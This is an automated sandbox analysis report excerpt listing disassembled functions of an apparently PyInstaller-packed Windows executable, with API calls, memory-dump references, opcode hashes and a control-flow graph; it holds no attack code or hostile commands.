                                                                                                                                                                                                                          Function 00007FF641F27B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                                                                                          • Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                                                                          • Instruction ID: 170d6b46326493f127eb0a2762ba118922b22ac9c050c93cb2fd89c6b138e4a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5218531A0CE8241EB91BB65E84026AA3E1FF917A4F100335DA6D83BE5DF7DD4468700
                                                                                                                                                                                                                          Function 00007FF641F233E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF641F23534), ref: 00007FF641F23411
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: GetLastError.KERNEL32(?,?,?,00007FF641F2342E,?,00007FF641F23534), ref: 00007FF641F22A14
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: FormatMessageW.KERNEL32(?,?,?,00007FF641F2342E), ref: 00007FF641F22A7D
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: MessageBoxW.USER32 ref: 00007FF641F22ACF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                          • API String ID: 517058245-2863816727
                                                                                                                                                                                                                          • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction ID: f1e14e5795f950f91e9bfbd4dfbd519f084b6c86a3b3b691a430538115aa4bf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9521B0A1B1C58281FBA3BB24E9013FA22D0BF98384F800232D65DC75E6EE2DE1068301
                                                                                                                                                                                                                          Function 00007FF641F28400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetCurrentProcess.KERNEL32 ref: 00007FF641F27B70
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: OpenProcessToken.ADVAPI32 ref: 00007FF641F27B83
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetTokenInformation.KERNELBASE ref: 00007FF641F27BA8
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetLastError.KERNEL32 ref: 00007FF641F27BB2
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: GetTokenInformation.KERNELBASE ref: 00007FF641F27BF2
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF641F27C0E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27B50: CloseHandle.KERNEL32 ref: 00007FF641F27C26
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF641F23814), ref: 00007FF641F2848C
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF641F23814), ref: 00007FF641F28495
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                                                                                          • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                          • Instruction ID: 3ece64c6a430cb939ec2bdd1fab11a6bcca384e33e80e6dc0bcd47fc65d3badb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6213C31A1CA8692F792BB60E9153EA63E0FB98780F844435EA4D837D6DF3DD446C740
                                                                                                                                                                                                                          Function 00007FF641F3C270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 819 7ff641f3c270-7ff641f3c295 820 7ff641f3c29b-7ff641f3c29e 819->820 821 7ff641f3c563 819->821 823 7ff641f3c2d7-7ff641f3c303 820->823 824 7ff641f3c2a0-7ff641f3c2d2 call 7ff641f39b24 820->824 822 7ff641f3c565-7ff641f3c575 821->822 826 7ff641f3c30e-7ff641f3c314 823->826 827 7ff641f3c305-7ff641f3c30c 823->827 824->822 829 7ff641f3c316-7ff641f3c31f call 7ff641f3b630 826->829 830 7ff641f3c324-7ff641f3c339 call 7ff641f42c2c 826->830 827->824 827->826 829->830 834 7ff641f3c33f-7ff641f3c348 830->834 835 7ff641f3c453-7ff641f3c45c 830->835 834->835 838 7ff641f3c34e-7ff641f3c352 834->838 836 7ff641f3c4b0-7ff641f3c4d5 WriteFile 835->836 837 7ff641f3c45e-7ff641f3c464 835->837 843 7ff641f3c4d7-7ff641f3c4dd GetLastError 836->843 844 7ff641f3c4e0 836->844 839 7ff641f3c466-7ff641f3c469 837->839 840 7ff641f3c49c-7ff641f3c4ae call 7ff641f3bd28 837->840 841 7ff641f3c354-7ff641f3c35c call 7ff641f33ae0 838->841 842 7ff641f3c363-7ff641f3c36e 838->842 846 7ff641f3c488-7ff641f3c49a call 7ff641f3bf48 839->846 847 7ff641f3c46b-7ff641f3c46e 839->847 867 7ff641f3c440-7ff641f3c447 840->867 841->842 849 7ff641f3c370-7ff641f3c379 842->849 850 7ff641f3c37f-7ff641f3c394 GetConsoleMode 842->850 843->844 845 7ff641f3c4e3 844->845 852 7ff641f3c4e8 845->852 846->867 853 7ff641f3c4f4-7ff641f3c4fe 847->853 854 7ff641f3c474-7ff641f3c486 call 7ff641f3be2c 847->854 849->835 849->850 857 7ff641f3c44c 850->857 858 7ff641f3c39a-7ff641f3c3a0 850->858 860 7ff641f3c4ed 852->860 861 7ff641f3c55c-7ff641f3c561 853->861 862 7ff641f3c500-7ff641f3c505 853->862 854->867 857->835 865 7ff641f3c429-7ff641f3c43b call 7ff641f3b8b0 858->865 866 7ff641f3c3a6-7ff641f3c3a9 858->866 860->853 861->822 868 7ff641f3c507-7ff641f3c50a 862->868 869 7ff641f3c533-7ff641f3c53d 862->869 865->867 872 7ff641f3c3ab-7ff641f3c3ae 866->872 873 7ff641f3c3b4-7ff641f3c3c2 866->873 867->852 876 7ff641f3c50c-7ff641f3c51b 868->876 877 7ff641f3c523-7ff641f3c52e call 7ff641f343b0 868->877 878 7ff641f3c53f-7ff641f3c542 869->878 879 7ff641f3c544-7ff641f3c553 869->879 872->860 872->873 874 7ff641f3c420-7ff641f3c424 873->874 875 7ff641f3c3c4 873->875 874->845 880 7ff641f3c3c8-7ff641f3c3df call 7ff641f42cf8 875->880 876->877 877->869 878->821 878->879 879->861 885 7ff641f3c417-7ff641f3c41d GetLastError 880->885 886 7ff641f3c3e1-7ff641f3c3ed 880->886 885->874 887 7ff641f3c40c-7ff641f3c413 886->887 888 7ff641f3c3ef-7ff641f3c401 call 7ff641f42cf8 886->888 887->874 890 7ff641f3c415 887->890 888->885 892 7ff641f3c403-7ff641f3c40a 888->892 890->880 892->887
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F3C25B), ref: 00007FF641F3C38C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F3C25B), ref: 00007FF641F3C417
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                          • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                          • Instruction ID: 85555b726a691344963a09d545ba15db66f83ad6fc4d1268d8289663ad0f509d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9891B032A1C65985F792FF69D4402BD2BE0BB54B88F14413ADE4EA7EC5EE38D4538702
                                                                                                                                                                                                                          Function 00007FF641F34938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                          • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                          • Instruction ID: 4040b9923be3e93d8bd9114e31f88e817aa0b24e0a5af294847f2ca812f45ac0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41A122D1C78643F795BBA0D54036962A0FBA47A4F109334E69D83ED6DF6CA1E38705
                                                                                                                                                                                                                          Function 00007FF641F2BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                          • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction ID: 675b66790f364f538da22db98ad6d6ecc0820223435f8e1ddf0d839f3399cdc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7314D39E4D68741FBE6FB6494123F913C1AF82784F940035E90EC76D7EE2EA9478215
                                                                                                                                                                                                                          Function 00007FF641F38D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                          • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction ID: 60c450ef61f47b9ced75b986fde826f1f04bf96ab2ee56ff5c4ac135ec4324c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81D06720F6C60A87EB963F715D6917912915FA8701B502538D84A877D3CD2CA80B4345
                                                                                                                                                                                                                          Function 00007FF641F2F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                          • Instruction ID: cac679e86ffda5a4bc88c4ceec7fe49bc8ecb48b84267d7e0491c92ed747f9d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C51D161B2D2C246EBAABF3694106BA66C1FF84BB4F144634DD6D87BD5CE3DE4038601
                                                                                                                                                                                                                          Function 00007FF641F3B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                          • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction ID: f128860154aa27e4d48308c8272b7740cf3e3c34ce5dcea41019620460c01a14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B411C471A1CA8581DB91BB25E81417D63A1AB44BF4F544331EE7D87BEACE3CD0538709
                                                                                                                                                                                                                          Function 00007FF641F39C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                          • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction ID: b6fc17f82ea6f7610bc2def2649a33250c391972a1e21e598bf871a10d6cc251
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E0E650F1D64B42FF967BF2A84517912D16FA4741B445034DD0DC7AD2DE2C64478211
                                                                                                                                                                                                                          Function 00007FF641F39E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39ED6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39EE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                          • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                          • Instruction ID: 18d8f464eb712e42b4cd5932d4cba0afad96f0a6332c24223da145e9c2c84669
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26218421F1CA4A41FFD6B765A55037D22D16F84B90F045235D96EC7FD2CE6CA4838312
                                                                                                                                                                                                                          Function 00007FF641F3B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
